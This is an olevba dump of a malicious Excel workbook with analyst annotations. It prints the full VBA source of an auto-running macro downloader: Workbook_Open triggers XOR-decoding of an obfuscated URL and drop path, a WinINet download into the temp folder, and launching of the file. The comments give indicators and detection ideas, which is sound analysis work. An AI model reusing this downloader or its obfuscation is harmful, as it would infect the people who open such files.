- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- 1.xls
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: 1.xls
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisBook.cls
- in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/ThisBook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Auto-run entry point: Excel raises Workbook_Open when the workbook is opened (olevba flags it as AutoExec below).
- ' Its only statement calls Phamt72loaj, which is defined in module File643, so the chain starts without further user action
- ' once macros are allowed to run.
- Sub Workbook_Open()
- Phamt72loaj
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+---------------+----------------------------------------+
- | Type | Keyword | Description |
- +----------+---------------+----------------------------------------+
- | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
- +----------+---------------+----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Page1.cls
- in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Page1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Page2.cls
- in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Page2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Page3.cls
- in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Page3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Heroro6.bas
- in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Heroro6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' This module contains only WinINet import declarations. The VBA-side names are random-looking, but the Alias
- ' strings give the real exports: InternetCloseHandle, InternetOpenA, InternetReadFile and InternetOpenUrlA.
- ' The #If branch supplies PtrSafe/LongPtr signatures for 64-bit VBA7 hosts, the #Else branch the 32-bit forms.
- ' Triage note: the Alias strings stay in clear text even when the local names are randomized, so matching on the
- ' aliased API names is more stable than matching on the declared identifiers.
- Option Explicit
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function HUDZOAKJJ Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
- Public Declare PtrSafe Function AJJJAKKL3 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
- Public Declare PtrSafe Function BVBAJAIE1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal HOHOFI1 As LongPtr, ByVal HAHABU4 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
- Public Declare PtrSafe Function ALKJPEQQ1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
- #Else
- Public Declare Function HUDZOAKJJ Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
- Public Declare Function AJJJAKKL3 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
- Public Declare Function BVBAJAIE1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal HOHOFI1 As Long, ByVal HAHABU4 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
- Public Declare Function ALKJPEQQ1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
- #End If
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO File55.bas
- in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/File55'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- '''+---- --+
- '''| Ariawase 0.6.0 |
- '''| Ariawase is free library for VBA cowboys. |
- '''| The Project Page: https://github.com/vbaidiot/Ariawase |
- '''+-- ----+
- Option Explicit
- Option Private Module
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------+----------------------+-------------+
- | Type | Keyword | Description |
- +------+----------------------+-------------+
- | IOC | https://github.com/v | URL |
- | | baidiot/Ariawase | |
- +------+----------------------+-------------+
- -------------------------------------------------------------------------------
- VBA MACRO File643.bas
- in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/File643'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' CDO-style authentication enum and encoding/charset name constants.
- ' None of these names is referenced by the routines shown in this listing; they look like filler taken from
- ' ordinary mail-handling code so that the module resembles benign VBA - NOTE(review): inferred, not confirmed.
- Public Enum CdoProtocolsAuthentication
- cdoAnonymous = 0
- cdoBasic = 1
- cdoNTLM = 2
- End Enum
- Public Const cdo7bit As String = "7bit"
- Public Const cdo8bit As String = "8bit"
- Public Const cdoISO_2022_JP As String = "iso-2022-jp"
- Public Const cdoShift_JIS As String = "shift-jis"
- Public Const cdoEUC_JP As String = "euc-jp"
- Public Const cdoUTF_8 As String = "utf-8"
- Public Const cdoBase64 As String = "base64"
- Public Const cdoQuotedPrintable As String = "quoted-printable"
- ' Trampoline between the auto-run handler (ThisBook.Workbook_Open) and the main routine KokoRuko in Module1.
- Sub Phamt72loaj()
- Dim KLAKKKSMMCV As Integer
- ' Junk loop: the counter only ever takes the value 0, so the "= 22 Then End" test can never fire.
- ' The same pattern recurs throughout the sample and has no effect other than padding the code.
- For KLAKKKSMMCV = 0 To 0
- If KLAKKKSMMCV = 22 Then End
- Next KLAKKKSMMCV
- ' The only effective statement: hand over to the downloader logic.
- KokoRuko
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Loop4.bas
- in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Loop4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- ' MBL: size of the fixed-length read buffer and the byte count requested per InternetReadFile call in TOPONO6.
- Private Const MBL = 8162
- ' AAN: passed as sAgent to InternetOpenA, i.e. the User-Agent of the request. The literal "PRO1" is unusual
- ' for an Office host and is a candidate network indicator for proxy-log hunting.
- Private Const AAN As String = "PRO1"
- ' IOTD: passed as lAccessType to InternetOpenA; the value 1 corresponds to INTERNET_OPEN_TYPE_DIRECT.
- Private Const IOTD = 1
- ' IFNCW: passed as dwFlags to InternetOpenUrlA; &H4000000 corresponds to INTERNET_FLAG_NO_CACHE_WRITE,
- ' so the response is not expected to be written to the WinINet cache - verify before relying on cache forensics.
- Private Const IFNCW = &H4000000
- ' TOPONO6(LINKO, FILO1): fetches the resource at URL LINKO through WinINet and writes the received data to path FILO1.
- ' Returns True only when a non-empty response was collected; on any failure the Boolean default (False) is returned.
- ' API names are the aliases declared in module Heroro6: AJJJAKKL3 = InternetOpenA, ALKJPEQQ1 = InternetOpenUrlA,
- ' BVBAJAIE1 = InternetReadFile, HUDZOAKJJ = InternetCloseHandle.
- Public Function TOPONO6(ByVal LINKO As String, ByVal FILO1 As String) As Boolean
- #If VBA7 And Win64 Then
- Dim HOHOFO2 As LongPtr, HOHOFI1 As LongPtr
- #Else
- Dim HOHOFO2 As Long, HOHOFI1 As Long
- #End If
- Dim HIHORE2 As Long
- Dim HAHABU4 As String * MBL, HUHUHISD6 As String
- Dim HEHEIFI5 As Integer, KLOPA8 As Double
- ' Open a WinINet session with User-Agent AAN, access type IOTD and no proxy settings.
- HOHOFO2 = AJJJAKKL3(AAN, IOTD, vbNullString, vbNullString, 0)
- If HOHOFO2 = 0 Then
- Exit Function
- End If
- ' Request the URL; a zero handle means the request failed and nothing is written.
- HOHOFI1 = ALKJPEQQ1(HOHOFO2, LINKO, vbNullString, 0, IFNCW, 0)
- If HOHOFI1 = 0 Then
- KLOPA8 = 0
- Else
- ' First read: the whole fixed-length buffer is copied, not just the HIHORE2 bytes actually read, so the file on
- ' disk can differ in size/hash from the served content - relevant when matching a dropped file to a payload.
- BVBAJAIE1 HOHOFI1, HAHABU4, MBL, HIHORE2
- HUHUHISD6 = HAHABU4
- ' Keep reading until InternetReadFile reports zero bytes, appending only the bytes read each time.
- Do While HIHORE2 <> 0
- BVBAJAIE1 HOHOFI1, HAHABU4, MBL, HIHORE2
- HUHUHISD6 = HUHUHISD6 + Mid(HAHABU4, 1, HIHORE2)
- Loop
- ' Write the accumulated string to FILO1 in binary mode.
- KLOPA8 = Len(HUHUHISD6): HEHEIFI5 = FreeFile
- Open FILO1 For Binary Access Write Lock Write As #HEHEIFI5
- Put #HEHEIFI5, , HUHUHISD6: Close #HEHEIFI5
- End If
- ' Both handles are closed unconditionally, including a zero URL handle on the failure path.
- HUDZOAKJJ HOHOFI1
- HUDZOAKJJ HOHOFO2
- HUHUHISD6 = ""
- ' A non-zero collected length is the success signal returned to the caller.
- If KLOPA8 Then
- TOPONO6 = True
- End If
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Corob5.bas
- in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Corob5'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Junk procedure: each GoTo jumps to the label on the very next line, so the body does nothing.
- ' It is Private and not called from any routine shown in this listing.
- Private Sub cdsf56GG()
- GoTo cssghjtky7
- cssghjtky7:
- GoTo louioui89
- louioui89:
- GoTo mgsmshm
- mgsmshm:
- GoTo ntyntyty
- ntyntyty:
- GoTo nyttdndny
- nyttdndny:
- GoTo brtjtjty
- brtjtjty:
- End Sub
- ' MANAHD3(parampam1, tarampam1): string de-obfuscation routine (the Chr/Xor use is what olevba flags below).
- '   parampam1 - key string
- '   tarampam1 - hex-encoded ciphertext, two hex digits per output character
- ' Returns the decoded string: each hex pair is XORed with one key character, the key repeating cyclically.
- ' Analyst note: the transform is simple enough to reproduce offline from the constants in Module1, so the
- ' hidden strings can be recovered without executing the macro.
- Public Function MANAHD3(parampam1 As String, tarampam1 As String) As String
- Dim ziZItoTO1 As Long
- Dim loLOpoPO1 As String
- Dim keKEpePE1 As Integer
- Dim DKKALLLAKK As Integer
- ' Junk loop (counter is only ever 0, so the End branch is unreachable); repeated twice more below.
- For DKKALLLAKK = 0 To 0
- If DKKALLLAKK = 25 Then End
- Next DKKALLLAKK
- Dim keKEpePE11 As Integer
- For ziZItoTO1 = 1 To (Len(tarampam1) / 2)
- ' Parse the ziZItoTO1-th pair of hex digits into a byte value.
- keKEpePE1 = val("&H" & (Mid$(tarampam1, (2 * ziZItoTO1) - 1, 2)))
- ' Key character at 1-based position (i Mod Len(key)) + 1, so the first byte uses the SECOND key character.
- keKEpePE11 = Asc(Mid$(parampam1, ((ziZItoTO1 Mod Len(parampam1)) + 1), 1))
- Dim LOAJNNCDHJ As Integer
- For LOAJNNCDHJ = 0 To 0
- If LOAJNNCDHJ = 14 Then End
- Next LOAJNNCDHJ
- ' XOR the byte with the key character and append the resulting character.
- loLOpoPO1 = loLOpoPO1 + Chr(keKEpePE1 Xor keKEpePE11)
- Dim PAPPAPPPAPP As Integer
- For PAPPAPPPAPP = 0 To 0
- If PAPPAPPPAPP = 4 Then End
- Next PAPPAPPPAPP
- Next ziZItoTO1
- MANAHD3 = loLOpoPO1
- End Function
- ' Junk procedure of the same shape as cdsf56GG: a chain of GoTo statements that each target the next line.
- ' It has no effect and is not called from any routine shown in this listing.
- Private Sub IHYbeffeVuJC()
- GoTo asefbttttawf3
- asefbttttawf3:
- GoTo sgr4bsgbf67gfh
- sgr4bsgbf67gfh:
- GoTo sdvxcxb
- sdvxcxb:
- GoTo SSSDFBSS
- SSSDFBSS:
- GoTo UTYRURU
- UTYRURU:
- GoTo KKTKTJT
- KKTKTJT:
- GoTo IhzKeee2ascfacas2zw
- IhzKeee2ascfacas2zw:
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+---------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+---------+-----------------------------------------+
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- +------------+---------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Class1.cls
- in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Small fixed-position container class: Init stores a ParamArray, Item1..Item4 return elements 0..3.
- ' Nothing in the routines shown in this listing instantiates it (olevba also reports no suspicious keyword here);
- ' it is presumably benign library code carried along with the malicious modules - NOTE(review): confirm.
- Private xInit As Boolean
- Private xItems As Variant
- Private xLength As Long
- ' Item1/Item2 read elements 0 and 1 without a length check (Init guarantees at least two items).
- Public Property Get Item1() As Variant
- Dim i As Long: i = 0
- If IsObject(xItems(i)) Then Set Item1 = xItems(i) Else Let Item1 = xItems(i)
- End Property
- Public Property Get Item2() As Variant
- Dim i As Long: i = 1
- If IsObject(xItems(i)) Then Set Item2 = xItems(i) Else Let Item2 = xItems(i)
- End Property
- ' Item3/Item4 raise error 380 when the stored array is too short for the requested position.
- Public Property Get Item3() As Variant
- Dim i As Long: i = 2
- If xLength <= i Then Err.Raise 380
- If IsObject(xItems(i)) Then Set Item3 = xItems(i) Else Let Item3 = xItems(i)
- End Property
- Public Property Get Item4() As Variant
- Dim i As Long: i = 3
- If xLength <= i Then Err.Raise 380
- If IsObject(xItems(i)) Then Set Item4 = xItems(i) Else Let Item4 = xItems(i)
- End Property
- ' Init may be called once; it raises error 5 on a second call or when fewer than two items are supplied.
- Public Sub Init(ParamArray itms() As Variant)
- If xInit Then Err.Raise 5
- xItems = itms
- xLength = UBound(itms) + 1
- If xLength < 2 Then Err.Raise 5
- xInit = True
- End Sub
- ' Returns the stored item array as-is.
- Public Function ToArray() As Variant
- ToArray = xItems
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Obfuscated configuration for KokoRuko. The four hex strings are ciphertexts for MANAHD3 (module Corob5);
- ' ceew343vgVV is the key passed as the first argument in every MANAHD3 call in this module.
- ' The rabannsd* numbers are not referenced by any code shown in this listing.
- ' vEVeE3286: decoded into the ProgID of the object whose .Open method is called on the dropped file.
- Private Const vEVeE3286 = "261110051947723D3D3D1C1A141D1C065D"
- Private Const rabannsd4 = 30
- ' ceceexcxxXXd: decoded into the suffix appended to the special-folder path (the drop file name).
- Private Const ceceexcxxXXd = "29091C1B1C1D0B7B63340D1C"
- Private Const rabannsd2 = 31
- ' ceecqq902: decoded into the URL handed to TOPONO6 - the download location, i.e. the key network indicator.
- Private Const ceecqq902 = "1D0D01194F461C3A3A265B1510071D08463E283F5B1D10461F1A1C2F243F5B1C0D0C"
- Private Const rabannsd1 = 33
- ' cemMmm381: decoded into the ProgID of the object used for GetSpecialFolder/FileExists/DeleteFile.
- Private Const cemMmm381 = "261A0700051D5A232A7F3310190C26104039283C3A1B1F0C161D"
- Private Const rabannsd0 = 34
- ' XOR key for all of the above.
- Private Const ceew343vgVV = "Quyuiui3MM"
- ' KokoRuko: main routine of the sample, reached via Workbook_Open -> Phamt72loaj.
- ' Sequence visible in the code: decode strings with MANAHD3, build a path under a special folder, delete any
- ' existing file at that path, download a URL to it with TOPONO6, then call .Open on the path through a second
- ' COM object. In short, a download-and-open stage driven entirely by the encoded constants above.
- ' All "For x = 0 To 0 / If x = N Then End" blocks are junk: the counter is only ever 0, so End is never reached.
- ' BIGABBDH1, dwwwdFO2, SASASA and SSSS are never declared; the module has no Option Explicit in this listing,
- ' so they become implicit Variants.
- ' Detection ideas grounded in this listing: an Office process issuing a WinINet request with User-Agent "PRO1",
- ' followed by a new file in a special (likely temporary) folder that the same process then opens.
- Sub KokoRuko()
- Dim lodppo21
- ' COM object created from a decoded ProgID; the GetSpecialFolder/FileExists/DeleteFile calls made on objects built
- ' from this same string are consistent with Scripting.FileSystemObject - verify by decoding offline.
- Set lodppo21 = CreateObject _
- (MANAHD3(ceew343vgVV, cemMmm381))
- Dim UPANDNNN2
- Const conspol3 = 2
- Dim DLAPPAKKVD3 As Integer
- For DLAPPAKKVD3 = 0 To 0
- If DLAPPAKKVD3 = 4 Then End
- Next DLAPPAKKVD3
- ' Special folder 2; for a FileSystemObject that value is the temporary folder (assumes the ProgID above).
- Set UPANDNNN2 = lodppo21.GetSpecialFolder(conspol3)
- Dim LPPAOOOAOAOMXNXNN As Integer
- For LPPAOOOAOAOMXNXNN = 0 To 0
- If LPPAOOOAOAOMXNXNN = 5 Then End
- Next LPPAOOOAOAOMXNXNN
- ' Drop path = special folder path followed by the decoded file-name string.
- BIGABBDH1 = UPANDNNN2 & MANAHD3(ceew343vgVV, ceceexcxxXXd)
- Dim PAOOKDKDKDAJWHNN21 As Integer
- For PAOOKDKDKDAJWHNN21 = 0 To 0
- If PAOOKDKDKDAJWHNN21 = 5 Then End
- Next PAOOKDKDKDAJWHNN21
- ' Second instance of the same COM class, used for the file checks below.
- Set dwwwdFO2 = CreateObject _
- (MANAHD3(ceew343vgVV, cemMmm381))
- Dim ASS555ASS As Integer
- For ASS555ASS = 0 To 0
- If ASS555ASS = 5 Then End
- Next ASS555ASS
- ' Remove a previous copy so the download always writes a fresh file.
- If dwwwdFO2.FileExists(BIGABBDH1) Then
- dwwwdFO2.DeleteFile BIGABBDH1
- End If
- Dim APOHRKJBMXIKSHJ As Integer
- For APOHRKJBMXIKSHJ = 0 To 0
- If APOHRKJBMXIKSHJ = 15 Then End
- Next APOHRKJBMXIKSHJ
- ' Download the decoded URL to the drop path. The result is ignored: the If body is empty.
- If TOPONO6(MANAHD3(ceew343vgVV, ceecqq902), BIGABBDH1) Then
- End If
- ' SSSS is never assigned anywhere in the listing; this statement has no effect.
- Set SSSS = Nothing
- Dim ALOOEPPPEPP2 As Integer
- For ALOOEPPPEPP2 = 0 To 0
- If ALOOEPPPEPP2 = 8 Then End
- Next ALOOEPPPEPP2
- ' Existence check with an empty body: the next step runs whether or not the download succeeded.
- If dwwwdFO2.FileExists(BIGABBDH1) Then
- End If
- Dim PLKJHAGGGTTTS As Integer
- For PLKJHAGGGTTTS = 0 To 0
- If PLKJHAGGGTTTS = 3 Then End
- Next PLKJHAGGGTTTS
- ' Third COM object, from a different decoded ProgID; calling .Open on a file path is consistent with
- ' Shell.Application, which would launch the dropped file with its associated handler - verify by decoding offline.
- Set SASASA = CreateObject _
- (MANAHD3(ceew343vgVV, vEVeE3286))
- Dim APQIEJAQPLQ As Integer
- For APQIEJAQPLQ = 0 To 0
- If APQIEJAQPLQ = 5 Then End
- Next APQIEJAQPLQ
- ' Final step: open the file at the drop path.
- SASASA.Open BIGABBDH1
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+--------------+-----------------------------------------+